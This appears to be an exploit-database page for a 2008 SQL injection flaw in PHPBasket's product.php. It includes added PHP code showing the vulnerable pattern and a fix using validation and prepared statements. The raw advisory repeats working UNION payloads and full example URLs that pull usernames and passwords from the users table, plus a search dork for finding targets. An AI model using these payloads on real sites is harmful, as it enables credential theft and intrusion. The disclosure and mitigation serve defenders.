Vendor: PHPBasket
By: r45c4l and sinner_01
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: PHPBasket
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2007

PHPBasket SQL Injection Vulnerability

PHPBasket is vulnerable to SQL injection: the `pro_id` parameter of `product.php` is placed into a database query without validation, so SQL appended to that parameter in the URL is executed by the database. The advisory below demonstrates this with a UNION-based payload appended to the vulnerable parameter: '2+union+all+select+1,2,3,4,concat(use_username,char(58),use_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+pb4_users--'

Mitigation:

Developers should validate user input (for example, confirming that `pro_id` is an integer) and pass it to SQL queries through parameterized (prepared) statements rather than concatenating it into the query string.
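As an added illustration of that mitigation (this is example code written for this page, not PHPBasket's own source), the block below shows a product lookup of the kind `product.php?pro_id=189` performs, first in the concatenated form that allows the injection and then hardened with type validation plus a PDO prepared statement. Only the script name and the `pro_id` parameter come from the advisory; the table `pb4_products`, the column `pro_name`, and the `$pdo` connection details are assumptions.

```php
<?php
// Added example, not PHPBasket code. Hypothetical schema: a table pb4_products
// with columns pro_id (INT) and pro_name; $pdo is an open PDO connection.
declare(strict_types=1);

// Vulnerable pattern: the raw query-string value is spliced into the SQL text,
// so whatever follows the number (e.g. "and 1=2 union all select ...") is
// executed as part of the query.
function findProductUnsafe(PDO $pdo, string $rawProId): ?array
{
    $sql = 'SELECT pro_id, pro_name FROM pb4_products WHERE pro_id = ' . $rawProId;
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Step 1 of the fix: enforce the type. FILTER_VALIDATE_INT accepts "189" and
// rejects "189 and 1=2 union ...", "189+union+...", "", null and arrays.
function validateProductId(mixed $raw): ?int
{
    if (!is_string($raw) && !is_int($raw)) {
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Step 2 of the fix: bind the validated value as a parameter. The database
// receives it as data, never as SQL text, so a UNION cannot be appended.
function findProductSafe(PDO $pdo, mixed $rawProId): ?array
{
    $id = validateProductId($rawProId);
    if ($id === null) {
        return null; // treat malformed input as "not found"
    }
    $stmt = $pdo->prepare('SELECT pro_id, pro_name FROM pb4_products WHERE pro_id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Usage in product.php (constructed; connection values are placeholders):
// $pdo = new PDO('mysql:host=localhost;dbname=shop;charset=utf8mb4', $dbUser, $dbPass, [
//     PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
//     PDO::ATTR_EMULATE_PREPARES => false, // server-side prepares, not client-side quoting
// ]);
// $product = findProductSafe($pdo, $_GET['pro_id'] ?? null);
// if ($product === null) { http_response_code(404); exit; }
```

With this in place, `validateProductId('189')` returns `189` while `validateProductId('189 and 1=2 union all select 1')` returns `null`, so the request is answered with 404 before any query runs; and even if validation were bypassed, the bound `PDO::PARAM_INT` value cannot alter the query's structure. Disabling `PDO::ATTR_EMULATE_PREPARES` is included so that the separation of query text and parameters is enforced by the database server rather than by client-side escaping.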
Source

Exploit-DB raw data:

################################################################ 
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
#        \/                  \/             \/                 # 
#                   ___________   ______  _  __                # 
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
#                 \  \___|  | \/\  ___/\     /                 # 
#                  \___  >__|    \___  >\/\_/                  # 
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################ 
# ---  d3hydr8 - jeed - baltazar - P47r1ck - C1c4Tr1Z - beenu # 
# ---  rsauron  - letsgorun - K1u - DON - OutLawz - MAGE  --- # 
################################################################ 
# 
# Author: r45c4l and sinner_01 
# 
# Home  : www.darkc0de.com & ljuska.org 
# 
# Email : r45c4l@hotmail.com, sinn3r01@gmail.com 
# 
# Share the c0de! 
# 
################################################################ 
# 
# App Name:  PHPBasket 
# 
# Soft.Site: http://www.phpbasket.com/
# 
# Dork: "Powered by PHPBasket" 
# 
# POC-1:-=2+union+all+select+1,2,3,4,concat(use_username,char(58),use_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+pb4_users-- 
# 
# P0C-2:-=2+union+all+select+1,2,3,4,concat(use_username,char(58),use_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+pb4_users--
# 
#Example: 
#http://localhost/product.php?cat_id=2&sub_id=14&pro_id=189+and+1=2+union+all+select+1,2,3,4,concat(use_username,char(58),use_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+pb4_users-- 
#
#http://localhost/product.php?cat_id=2&sub_id=14&pro_id=189+and+1=2+union+all+select+1,2,3,4,concat(use_username,char(58),use_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+pb4_users-- 
#
################################################################ 
# Vuln Discovered 17/08/2008 

# milw0rm.com [2008-08-17]